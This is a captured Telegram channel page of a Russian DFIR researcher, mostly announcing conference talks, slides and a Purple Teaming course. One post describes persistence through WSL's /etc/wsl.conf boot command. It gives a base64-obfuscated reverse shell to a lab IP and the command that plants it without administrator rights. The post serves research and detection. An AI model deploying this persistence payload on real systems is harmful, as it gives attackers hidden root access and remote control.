TGViewer
Channel Public Channel
Garden Detective

Garden Detective

@gardendetective

DFIR... но на этом не останавливаемся.

Администратор: @SmartGlue
Subscribers
925
Photos
20
Videos
5
Links
24
Recent Posts 16 shown
Post #52 1.83K
#mfd2026
🔵 Выкладываю презентацию доклада «DFIR vs WSL: цифровая криминалистика на стыке миров» с конференции Moscow Forensics Day 2026.
Цифровая криминалистика + WSL? Второе — точно, а чтобы узнать про первое — придётся открыть презентацию.

💻 Ссылка на презентацию
  • 🔥 13
  • 👍 11
  • ❤ 9
Post #51 1.55K
Azerskiy_V_ThreatZone_OFFZONE2026.pdf5.8 MB
#offzone2026
🔵 Время уже выложить презентацию доклада «Jump Lists: Your Trace, My Trap», который был на треке Threat.Zone 🥴
*что-то там про криминалистический артефакт Jump Lists и то, как он может быть использован атакующими, пентестерами или Red Team*

💻 Ссылка на презентацию
  • 🔥 20
  • ❤ 9
  • 👍 6
Post #50 905
#events #blog
Немного новостей:
🔵 21 августа, 15:00–15:30: буду выступать на конференции OFFZONE 2026 с докладом «Jump Lists: Your Trace, My Trap».
Jump Lists — артефакт, хорошо знакомый каждому DFIR‑специалисту. По нему восстанавливают хронологию действий пользователя, находят следы открытия файлов/каталогов и выявляют подозрительную активность. Но что, если посмотреть на него с другой стороны — глазами offensive‑специалиста?

Уже на этой неделе, приходите 🚪

🔵 4 сентября, 12:15–12:35: другое мероприятие — Moscow Forensics Day 2026, где я представлю доклад «DFIR vs WSL: цифровая криминалистика на стыке миров».

🔵 Также подал доклад на ZeroNights 2026 и теперь в ожидании результатов от CFP комитета (если примут, то снова поговорим про обход «песочниц»).

🔴 Ну и конечно, советую прочитать новую статью от Лаборатории F6, вышедшую сегодня. Там мы разбираем TTPs группировки GOFFEE (Paper Werewolf), которые встретили в рамках IR.
Про данную APT-группировку мы с Иваном Груздом ещё рассказывали на летнем фестивале CyberCamp (ссылка 💻).
  • 🔥 13
  • ❤ 9
  • 👍 5
  • 🥰 3
  • 😍 1
  • 💅 1
Post #49 1.47K
#cybercamp2026 #leto
17 июля совместно с Иваном Груздом мы выступили с двумя докладами на летнем фестивале CyberCamp, где затронули кейс с APT-группировкой.

🔵 На сцене докладов: «Чтобы найти атакующего, иногда приходится провести двадцать лет вместе © кибербарон Мюнхгаузен»
Рассмотрим хронологию затяжной APT-атаки. Вы узнаете, как хакеры годами оставались незамеченными, какие техники закрепления использовали и как скрывали сетевые следы. Имя этой группировки пока держим в секрете, но масштаб вас впечатлит.

💻 Ссылка на презентацию

🔵 На сцене практики: «Неужели обязательно нужно снести инфраструктуру, чтобы выгнать атакующих? © кибербарон Мюнхгаузен»
Конкретные примеры и пошаговая проверка гипотез. Спикеры объяснят, как находить «приветы из прошлого», превентивно блокировать домены злоумышленников и проводить форензику при остром дефиците данных.

💻 Ссылка на презентацию

А насчет самого мероприятия буду краток: всё как всегда на высшем уровне! 😘
  • 🔥 17
  • ❤ 12
  • 👍 7
  • 🥰 3
  • 💅 1
Post #48 1.64K
#persistence #standofftalks2026
🔵 Вот и прошёл Standoff Talks 2026, и пора выложить презентацию доклада, с которой выступал 19 июня, — «Нельзя просто так взять и… не использовать Obsidian в атаке».
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

🔵 Кратко о том, что было в докладе:
➖ ПО для заметок Obsidian и система плагинов;
➖ разбор атаки кампании REF6598;
➖ обход Restricted Mode;
➖ использование Obsidian CLI;
➖ PoC описанного в докладе сценария (хорошее закрепление для любителей оставлять свои "заметки").
*️⃣код PoC (когда-нибудь я буду нормально оформлять репозитории, но это не точно 🥳);
*️⃣ну и конечно, куда же без видео 🚪.
  • 🔥 18
  • ❤ 6
  • 💅 4
  • 👍 1
Post #47 1.89K
AzerskiyVlad_CIRF2026.pdf5.5 MB
#anti_forensics #DFIR #cirf2026
🔵 Вчера (23.04.2026) проходила конференция CIRF 2026, на которой я выступил с докладом "Генеральная уборка в Windows: искусство заметать цифровые следы". Да, и это снова одна из моих любимых тем — контр-криминалистические методы. 🚪
*️⃣Ссылка на презентацию.

🔵 Отдельно хочу отметить организацию конференции и выступления других спикеров — всё было на высшем уровне. 🏖
  • 🔥 30
  • ❤ 12
  • 👏 8
  • 💅 1
Post #46 2.23K
Я в своем познании Purple Teaming настолько преисполнился, что решил: настало время делиться опытом. Поэтому мы вместе с Олегом и нашими друзьями из Inseca разработали 6-недельный курс по данному направлению.

Какие темы затронем на курсе:
1️⃣Что такое Purple Teaming и почему вам стоит им заниматься?
2️⃣Как подготовиться к киберучениям в подобном формате и как сделать их процессом?
3️⃣Что такое эмуляция действий атакующих, где брать данные для нее, и как с ними работать?
4️⃣Как разрабатывать детектирующую логику и когда этим следует заниматься?
5️⃣Что такое Threat Hunting, когда и кому он нужен?
6️⃣Как проводить киберучения и как автоматизировать этот процесс?

Старт курса намечен на 13 марта, а следовательно, для читателей канала есть приятный бонус: скидка 10% по промокоду gardendetective.
  • 🔥 17
  • ❤ 6
  • 👏 3
  • 😁 1
  • 🤮 1
  • 💯 1
Post #45 2.3K
#persistence #t1037 #wsl
🔵 Копаясь в документации Microsoft по подсистеме WSL (Windows Subsystem for Linux), нашёл интересный механизм закрепления. В каждом инстансе можно создать файл /etc/wsl.conf и в секции [boot] указать для параметра command команду, которая будет выполняться с правами root при каждом его запуске.

Пример содержимого файла /etc/wsl.conf (запуск обратной оболочки):
[boot]
command=echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM3LjEyOS8yMjIyIDA+JjE= | base64 -d | /bin/bash


🔴 Представим сценарий, в котором атакующий удалённо подключился по протоколу RDP к рабочей станции ИТ-администратора под управлением ОС Windows 11, на которой включен WSL2 и настроен Linux-дистрибутив.
Цель злоумышленника — закрепиться в системе через файл /etc/wsl.conf.

Команды (cmd.exe, powershell.exe; запуск без прав Администратора):
wsl -l -v
wsl -u root -d <distro_name> --exec bash -c "echo -e '[boot]\ncommand=echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM3LjEyOS8yMjIyIDA+JjE= | base64 -d | /bin/bash' > /etc/wsl.conf"

Пссс... После получения обратной оболочки... Напоминаю: из WSL по умолчанию можно запускать исполняемые файлы Windows.

🔵 Дополнительные моменты:
➖После внесения изменений в конфигурационный файл /etc/wsl.conf, полезная нагрузка, указанная в command, выполнится при следующем запуске инстанса WSL. Некоторые нюансы работы экземпляра WSL:
*️⃣в сборке 18267 Microsoft добавили механизм таймаута завершения работы инстанса WSL, и он по умолчанию установлен на 15 секунд. Это означает, что экземпляр будет остановлен через 15 секунд после завершения последнего процесса WSL;
*️⃣если под процессом /init (PID 2) в WSL запущен хотя бы один пользовательский процесс (например, в фоновом режиме), то экземпляр WSL не будет завершён (ссылка);
Пример:
nohup python3 -m http.server 8000 &

*️⃣для того, чтобы принудительно завершить работу определённого дистрибутива или всех сразу, можно использовать эти команды:
wsl -t <distro_name> 
wsl --shutdown
  • 🔥 21
  • 👍 5
  • 🍓 4
  • ❤ 3
  • 💅 2
  • 🤯 1
Post #44 1.51K
#socforum2025 #zeronights2025
🔵 Последние 2 доклада в этом году (🍩):

1️⃣ Доклад «После Red Team можно не бояться атак... Не бояться атак, да?» [SOC Forum 2025].
➖ Совместно с Олегом Скулкиным (ссылка на TG-канал).
Описание доклада:
В докладе рассмотрим различия в тактиках, техниках и процедурах (TTP) между реальными хакерскими группировками и командами Pentest / Red Team. Эта разница объясняется тем, что профили атак, используемые в пентестах, часто не отражают реальные угрозы. 

Доклад поможет понять, как отличать инциденты, связанные с реальными атаками, от имитаций, а также почему реагирование на «пентестовые» сценарии могут привести к ложному чувству защищенности.

*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

2️⃣ Доклад «Горшочек, не вари! Истории про Web3-ловушки» [ZeroNights 2025].
➖ Совместно с Николаем Микрюковым (@Nmikryukov).
Описание доклада:
Смарт-контракты, которые только притворяются уязвимыми... В нашем докладе мы рассмотрим существующие и ранее применявшиеся в Web3 трюки децентрализованных ханипотов.

*️⃣Ссылка на презентацию;
*️⃣Запись выступления.
  • 🔥 20
  • ❤‍🔥 8
  • 🦄 5
  • 😍 3
  • 😎 1
Post #43 2.68K
#cybercamp2025 #DFIR #task
🔵 Настало время опубликовать пост с веб-ссылками на доклады и разбором одного задания с CyberCamp 2025. Максимальная концентрация DFIR. 🍩

1️⃣ Доклад «Первое правило CI/CD-клуба: компрометация начинается с доверия».
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

2️⃣ Разбор задания «Горький коммит».
*️⃣Ссылка на презентацию;
*️⃣Запись эфира с разборами кейсов.
P.S.: в разборе присутствуют 2 веб-ссылки на дополнительный материал:
➖подготовка к эмуляции атаки;
➖эмуляция действий атакующих.

🔵 И конечно, не могу не упомянуть доклады от своих любимок (😍):

3️⃣Доклад «ИБ-специалист в отпуске? Поздравляю, теперь ты – инцидент-респондер!» от Ивана Грузда.
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

4️⃣Доклад «Чертовски хороший Compromise Assessment» от Анастасии Петровой.
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.
  • 🔥 15
  • ❤ 7
  • 💘 3
  • 🦄 2
Post #42 1.08K
#events
🔵 Пришло время для нового поста! А после него начну публиковать интересные исследования — ждите их в декабре. Пора освежить канал не только рассказами о выступлениях, но и чем-то новым. 🍩

1️⃣Про SOC Forum я уже писал в предыдущем посте, но напомню, что 20 ноября будет доклад на тему «После Red Team можно не бояться атак... Не бояться атак, да?». Да-да, там также будут мемы. Куда же без них!

2️⃣А 21 ноября будет эфир, завершающий арку CyberCamp 2025.
На нём будет:
➖ разбор четырех заданий их авторами: «Горький коммит» из соло-программы (моё наследие; будет разбор данного задания от меня🍩), а из командных киберучений — to My Curious Programmer, «Политик аналитик», NightCall;
➖ подведение итогов кэмпа и статистика — самые интересные доклады и задания, самые активные участники, обсуждение обратной связи и планов на будущее;
➖ возможность выиграть еще немного мерча!

3️⃣И напоследок, 26 ноября совместно с Николаем Микрюковым (@Nmikryukov) будем выступать на конференции ZeroNights 2025 с докладов «Горшочек, не вари! Истории про Web3-ловушки», где расскажем про существующие и ранее применявшиеся в Web3 трюки децентрализованных ханипотов.

Ну и мем для привлечения внимания 🥳
  • 🔥 21
  • ❤‍🔥 5
  • 💯 4
  • ❤ 2
  • ⚡ 2
  • 👍 1
  • 🆒 1
Post #39 2.03K
#events
🔵 Уже почти конец года, но различных выступлений и активностей так и не убавилось.🚪

1️⃣Начнём с самого интересного — это CyberCamp 2025 (ну просто любимки). В первый день докладов кэмпа (21 октября) можно будет погрузиться в мир тайн компрометации. Поэтому рекомендую послушать эти три доклада.
Также в данном году появился новый формат — консультации, где можно задать свои животрепещущие вопросы спикерам по различным темам. Если хочется обсудить Incident Response, Compromise Assessment или Purple Teaming, то регистрируйтесь — пообщаемся на эти темы без лишней душноты. 💻
P.S.: планируется какой-то секретный эфир. Что именно это будет, пока остается загадкой.

UPDATE: секретный эфир.

2️⃣На конференция SOC Forum 2025 будет доклад "После Red Team можно не бояться атак... Не бояться атак, да?" (20 ноября). Совместно с Олегом поговорим про различия... между реальными хакерскими группировками и командами Pentest/Red Team.

3️⃣И последнее: подал 2 доклада на ZeroNights. Так что, ждём результатов от CFP комитета.
  • 🔥 24
  • ❤ 8
  • 👍 6
  • 💅 5
  • 💩 1
  • 🐳 1
Post #36 1.84K
#uwp #DFIR #mfd2025
🔵 С 11 по 12 сентября проходила девятая ежегодная конференция — Moscow Forensics Day 2025.
На данном мероприятии выступал с докладом на тему "UWP под прицелом DFIR: что скрывают современные Windows-приложения".

Удалось осветить следующие пункты:
1️⃣ Что такое UWP (Universal Windows Platform) и MSIX-пакеты.
2️⃣ Инциденты ИБ, связанные с использованием MSIX-пакетов.
3️⃣ Криминалистические артефакты, возникающие при установке MSIX-пакета, и их источники.
4️⃣ Приложения из Microsoft Store, представляющие интерес для злоумышленников.

🔵 Также отдельно выкладываю список полезных веб-ресурсов/веб-ссылок (оформлено в Obsidian).

P.S.: уже в состоянии ожидания Moscow Forensics Day 2026 🚪
  • 🔥 14
  • 👍 9
  • ❤‍🔥 4
  • 👎 2
  • 🐳 2
Post #34 2.04K
AzerskiyVD_ThreatZone_OffZone2025.pdf6.1 MB AzerskiyVD_FastTrack_OffZone2025.pdf4.5 MB
#offzone2025
🔵 Прошла очередная конференция — OFFZONE 2025. Поэтому самое время выложить презентации докладов, с которыми я выступал на данном мероприятии.🚪

1️⃣ На следующей неделе выложу дополнительный материал к докладу "Охота на призраков: изучение сетевой инфраструктуры атакующих" — полезные веб-ресурсы и ссылки, оформленные в Obsidian.🤪

2️⃣ Также позже залью на свой GitHub скрипты из второго доклада, связанного с GitLab.

UPDATE:
*️⃣Запись выступления №1;
*️⃣Запись выступления №2.
  • 👍 18
  • 🔥 16
  • ❤‍🔥 6
  • 🐳 2
Post #32 1.45K
#offzone2025
22 августа буду выступать на конференции OffZone 2025 с двумя докладами [🤪 которые я успешно доделал 🤪]. Буду рад видеть каждого, кто заглянет на мои выступления.

Расписание:
1️⃣"Охота на призраков: изучение сетевой инфраструктуры атакующих".
Трек: Threat.Zone.
Время: 12:30-13:00.
Описание.

2️⃣"Охота на тануки: узнаём точную версию GitLab".
Трек: Fast Track.
Время: 14:45–15:15.
Описание.
  • 🔥 26
  • 👏 3
  • ❤‍🔥 2
  • ❤ 2
  • 👍 1
  • 🐳 1
Older posts →

About this channel

How can I read @gardendetective without a Telegram account?
TGViewer shows the public web preview Telegram publishes for Garden Detective: recent posts, photos, videos and the subscriber count, with no app, login or account.
How many subscribers does Garden Detective have?
Garden Detective (@gardendetective) has 925 subscribers on Telegram, refreshed roughly every 30 minutes.
Does Garden Detective know I viewed it here?
No. Public channel previews carry no viewer identity, and TGViewer has no accounts or tracking of what you look up.
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →